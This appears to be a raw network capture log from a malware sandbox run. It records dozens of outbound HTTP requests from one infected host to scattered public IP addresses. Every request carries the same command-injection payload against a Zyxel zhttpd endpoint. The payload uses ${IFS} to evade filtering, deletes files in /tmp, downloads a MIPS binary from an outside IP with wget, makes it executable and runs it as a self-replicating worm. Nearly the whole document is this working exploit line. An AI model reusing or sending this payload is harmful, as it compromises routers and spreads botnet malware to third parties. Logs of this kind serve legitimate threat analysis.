                                              Jan 29, 2024 07:04:07.349920988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8670192.168.2.143312614.254.2.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.349966049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8671192.168.2.1460484178.250.152.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350013018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8672192.168.2.1454100211.128.230.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350055933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8673192.168.2.1450674212.17.194.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350112915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8674192.168.2.144010096.64.88.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350137949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8675192.168.2.1456294129.185.50.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350172997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8676192.168.2.145800025.192.230.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350220919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8677192.168.2.145428259.249.116.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350258112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8678192.168.2.1435660207.234.100.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350281000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8679192.168.2.145338449.148.0.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350316048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8680192.168.2.146048483.18.86.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350342035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8681192.168.2.1437570201.128.187.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350397110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8682192.168.2.1448560202.220.107.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350435019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8683192.168.2.1458074118.118.27.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350476980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8684192.168.2.145642242.86.211.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350497961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8685192.168.2.1450288104.225.16.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350512981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8686192.168.2.1441850168.17.96.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350574970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8687192.168.2.1451766153.62.159.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350620985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8688192.168.2.143714645.236.236.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350645065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8689192.168.2.1439306197.144.62.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350698948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8690192.168.2.1433242218.196.59.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350740910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8691192.168.2.144197060.190.2.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350769997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8692192.168.2.1442842125.2.30.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350809097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8693192.168.2.1451044119.94.78.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350856066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8694192.168.2.1435130221.86.158.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350883961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8695192.168.2.1459000201.224.217.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350929022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8696192.168.2.143809649.243.15.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.350953102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8697192.168.2.1446472169.218.123.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351013899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8698192.168.2.145076020.120.102.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351028919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8699192.168.2.1458062188.144.143.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351092100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8700192.168.2.1448236198.90.64.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351110935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8701192.168.2.1451280144.164.68.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351149082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8702192.168.2.1446512182.29.90.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351216078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8703192.168.2.1455656144.12.244.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351248980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8704192.168.2.145196854.92.208.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351295948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8705192.168.2.1442732108.55.203.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351345062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8706192.168.2.145710486.134.202.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351387024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8707192.168.2.1433740122.179.177.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351422071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8708192.168.2.1452018212.105.216.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351464033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8709192.168.2.144914073.204.1.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351505041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8710192.168.2.14393489.148.129.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351550102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8711192.168.2.1448784165.117.130.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351603985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8712192.168.2.1453472167.196.44.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351629972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8713192.168.2.1435108114.157.249.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351664066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8714192.168.2.1458682183.0.1.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351720095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8715192.168.2.1445996129.246.225.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351739883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8716192.168.2.144821496.50.11.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351784945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8717192.168.2.1432884103.193.114.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351809978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8718192.168.2.1446668204.219.23.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351834059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8719192.168.2.1458338171.155.6.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351867914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8720192.168.2.1456886171.93.216.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351922989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8721192.168.2.1449024196.225.206.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.351972103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8722192.168.2.1432884216.227.95.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352013111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8723192.168.2.144165441.138.200.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352047920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8724192.168.2.1433174153.107.170.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352076054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8725192.168.2.1436214124.170.50.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352108955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8726192.168.2.144924836.50.234.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352148056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8727192.168.2.14371645.0.123.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352181911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8728192.168.2.1434890187.231.77.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352224112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8729192.168.2.14588604.40.226.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352252960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8730192.168.2.1440214158.240.202.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352283001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8731192.168.2.1447024201.157.35.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352371931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8732192.168.2.145051414.121.32.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352396011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8733192.168.2.1456364165.99.115.48443
                                              TimestampBytes transferredDirectionData
